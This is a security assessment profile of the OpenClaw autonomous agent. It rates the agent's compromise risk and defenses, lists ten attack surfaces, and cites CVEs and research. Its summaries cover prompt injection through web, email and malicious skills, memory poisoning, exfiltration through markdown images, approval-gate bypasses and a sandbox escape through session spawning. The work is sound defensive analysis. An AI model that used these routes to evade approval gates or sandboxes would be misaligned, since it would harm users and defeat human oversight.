AIRQ Framework · AI Agent Security Profile

OpenClaw Security

Browser & Computer Use openclaw.ai

OpenClaw is an open-source autonomous personal agent with full shell, browser, file system, and email access, plus integrations across more than twenty messaging platforms. It runs as a 24/7 daemon on the user's machine and extends its capabilities through a public skills marketplace. In the April 2026 assessment, OpenClaw scored 9.2/10 for compromise risk and 0/15 for defense — placing it among the highest-risk agents in the cohort and squarely in the Reckless Powerhouses quadrant.

Compromise
9.2/10
Severe
Harm Potential
10/10
Maximum
Defense
0/15
None
Verified Defense
0/9
None
SAC Score
3.52
Bottom decile

What is this? The AI Agent Risk Quadrant is an independent reference assessing the security posture of production AI agents across three dimensions: how easily they can be compromised, how much damage a compromise can cause, and how effective their defensive controls are.

1 Risk Scores

Five headline metrics from the AIRQ methodology. The first two place the agent on the quadrant; the remaining three describe how much defense is actually in place.

Compromise Score: 9.2 / 10. Among the easiest agents in the set to compromise. Multiple well-documented attack paths, confirmed zero-click vectors, and several published CVEs.

Ability to Inflict Real Harm: 10 / 10. Maximum. Shell, network, credentials, file system, and autonomous action are all available, and nothing meaningfully contains the blast radius.

Total Defense Score: 0 / 15. No defensive controls across any of the five defense categories.

Verified Defense: 0 / 9. All three high-confidence defense categories are absent — a confirmed architectural state, not a research gap.

Security-Adjusted Capability: 3.52. OpenClaw's wide capability footprint cannot offset zero defense and very high compromise exposure, placing it near the bottom of the ranking.

2 Defense Components

Five MECE categories (Input → Processing → Action → Output → Detection) each scored 0–3. OpenClaw scores zero across all five.

Input Guardrails
0
Execution Isolation
0
Action Controls
0
Output Guardrails
0
Monitoring & Audit
0

Input Guardrails: 0 / 3. Nothing filters untrusted content before it reaches the agent. Any webpage, email, chat message, or marketplace skill can deliver prompt injection straight into the reasoning loop.

Execution Isolation: 0 / 3. The agent runs in-process with user-level privileges, unrestricted network, and full file system access. No sandbox, container, or network allowlist is enabled by default.

Action Controls: 0 / 3. Tool calls execute without approval gates or permission model. The agent can send, publish, deploy, or purchase on the user's behalf with no interruption point.

Output Guardrails: 0 / 3. Outputs flow through markdown, image, and URL rendering unchecked, leaving every documented exfiltration channel open.

Monitoring & Audit: 0 / 3. No structured logging, no audit trail, and no compliance certification. Incidents are effectively invisible until they produce visible second-order damage.

3 Attack Surface Exposure

Ten surfaces scored 0–4 each. Eight of ten score 3 or higher; six are at the architectural maximum.

Attack Surface Scores
User Input
4
External Data
4
Memory
4
Reasoning
2
Planning
2
Tool Execution
4
Orchestration
4
Inter-Agent
3
Output Processing
4
Configuration
4

User Input: 4 / 4. Direct prompt injection is trivially effective. No input validation, no separation between the user's intent and adversarial content.

External Data: 4 / 4. Ingests content from web pages, email, 20+ messaging platforms, local files, and the skills marketplace. Every channel is an attacker-controlled input path.

Memory: 4 / 4. Persistent cross-session memory with no integrity verification. One successful poisoning persists into every future conversation.

Reasoning: 2 / 4. Moderate exposure. Goal manipulation is a theoretical risk, but adversaries rarely need to attack the reasoning layer when the input channel itself is open.

Planning: 2 / 4. Task decomposition is exploitable, but damaging outcomes arrive through tool execution before planning subtleties matter.

Tool Execution: 4 / 4. Full shell, code execution, API calls, and credential access within scope. The surface that converts any compromise into concrete harm.

Orchestration: 4 / 4. Autonomous multi-step chains with no interruption points — compromise at any step propagates unimpeded.

Inter-Agent: 3 / 4. Weak trust model between cooperating agents creates meaningful cascade risk, though it is not the lead attack vector today.

Output Processing: 4 / 4. Markdown, image URLs, and unsanitized redirects give attackers several exfiltration channels for sensitive context.

Configuration: 4 / 4. The plugin and skills supply chain is the most mature attack path — 820+ malicious skills have already been documented in the marketplace.

4 Detailed Assessment

Agent properties mapped against best-in-class reference agents from the same cohort.

DimensionOpenClawBest-in-class reference
Untrusted input surfaces Web, email, messages, files, 20+ messaging platforms, browser, shell, marketplace skills Code-completion tools with no web or messaging ingress
Tool capabilities Full shell, browser, file system, 20+ messaging platforms, email, 24/7 daemon, marketplace skills Scoped tool access with explicit capability declarations
Human-in-the-loop None; fully autonomous 24/7 daemon Claude Code: 3-level permission model with deny accumulation
Sandboxing & isolation None; 30K+ exposed instances; no network isolation; no file scoping; no credential management Claude Code: Seatbelt + Bubblewrap + domain allowlist. Codex CLI: Landlock + network blocked.
Known CVEs & incidents 10+ CVEs; 820 malicious marketplace skills; mass exploitation documented; zero-click vectors confirmed Cohort agents with zero published CVEs and independent adversarial testing
Compliance posture None Ada AI (AIUC-1, SOC 2); Moveworks (FedRAMP); Augment Code (SOC 2, ISO 42001)
Key Risk
Fully exposed autonomous agent with zero controls; mass exploitation actively occurring.

Lethal Trifecta

Yes — all three

The Lethal Trifecta (Simon Willison) applies when an agent combines exposure to untrusted input, access to sensitive data, and the ability to communicate externally. OpenClaw meets all three conditions: ingests untrusted content from web, email, and marketplace skills; accesses user files, credentials, and messaging platforms; and can send outbound traffic without restriction.

5 Hardening Recommendations

If OpenClaw is deployed in an enterprise environment, these controls map to the five defense components. None restores the agent to acceptable risk; they reduce blast radius.

Input (Input Guardrails)

  1. Disable the skills marketplace entirely; allowlist only internally audited skills. Treats the 820+ documented malicious skills as the baseline threat model rather than an edge case.
  2. Strip or quarantine HTML, markdown, and embedded content from any ingested email, chat message, or web page before it reaches the agent context.

Isolation (Execution Isolation)

  1. Run OpenClaw inside a rootless container or Bubblewrap sandbox with network blocked by default and an explicit domain allowlist.
  2. Scope file system access to a dedicated working directory; remove access to home directory, credential stores, and SSH keys.
  3. Run under a dedicated OS user with no sudo rights and no access to user credentials, tokens, or browser profiles.

Action (Action Controls)

  1. Introduce an approval-gate proxy for any tool call matching shell execution, file write outside the working directory, or outbound network to a non-allowlisted domain.

Output (Output Guardrails)

  1. Disable markdown image rendering and URL auto-fetch in any interface consuming OpenClaw output. Closes the primary documented exfiltration channels.

Detection (Monitoring & Audit)

  1. Log all tool calls, shell commands, and outbound network connections; alert on the known indicators of compromise from the 10+ published CVEs and the ClawHavoc malicious-skill set.

Even with all of the above in place, OpenClaw's base architecture (persistent memory without integrity verification, unrestricted orchestration chains) keeps it in the upper half of the compromise-score range. For environments with sensitive data, the recommendation remains non-deployment.

6 Threat Intelligence

Published vulnerabilities, security research, and active exploitation evidence informing the compromise and defense scores above.

CVEs and Advisories

  1. CVE-2026-25253 — ClawBleed RCE (CVSS 8.8). Remote code execution via crafted skill manifest. An attacker-controlled skill can execute arbitrary code on the host system during installation.
  2. CVE-2026-32922 — Privilege Escalation (CVSS 9.9). Local escalation to root via daemon misconfiguration. The 24/7 daemon process runs with insufficient privilege separation, allowing a compromised agent to gain root access.
  3. CVE-2026-29607 / CVE-2026-28460 — Approval Bypass. Tool-call approval checks are bypassed under specific plugin states. Agents can execute privileged actions without triggering the intended confirmation gates.
  4. CVE-2026-26322 — Server-Side Request Forgery (CVSS 7.6). SSRF via browser-tool URL handling. The agent's browser module can be directed to make requests to internal network resources.
  5. CVE-2026-34426 — Approval Bypass via Environment Variables. Approval gates are bypassed when specific environment variables are set, enabling silent execution of restricted tool calls.
  6. jgamblin/OpenClawCVEs — community-maintained CVE tracker cataloguing 156 advisories to date.

Published Research

  1. The Hacker News — OpenClaw bug enables one-click remote exploitation. Walkthrough of the zero-click attack chain from crafted webpage to full shell access.
  2. Kaspersky — OpenClaw vulnerabilities exposed. Analysis of the agent's attack surface from an endpoint-security perspective.
  3. CrowdStrike — What security teams need to know about the OpenClaw AI super-agent. Enterprise threat assessment and detection guidance.
  4. Cisco — Personal AI agents like OpenClaw are a security nightmare. Network-level risks when autonomous agents operate on corporate infrastructure.
  5. Snyk — ToxicSkills: malicious AI agent skills on ClawHub. Supply-chain analysis of 820+ malicious skills in the public marketplace.
  6. Oasis Security — ClawJacked research on session hijacking. Demonstrates how an attacker can take over active agent sessions through crafted inter-agent messages.
  7. Wiz / ARMO — Analysis of sandbox escape via sessions_spawn. Documents how the agent's session management API can be exploited to break out of any applied container isolation.
  8. ClawHavoc — 341+ documented malicious skills in the public marketplace. The most comprehensive catalogue of supply-chain attacks targeting the OpenClaw ecosystem.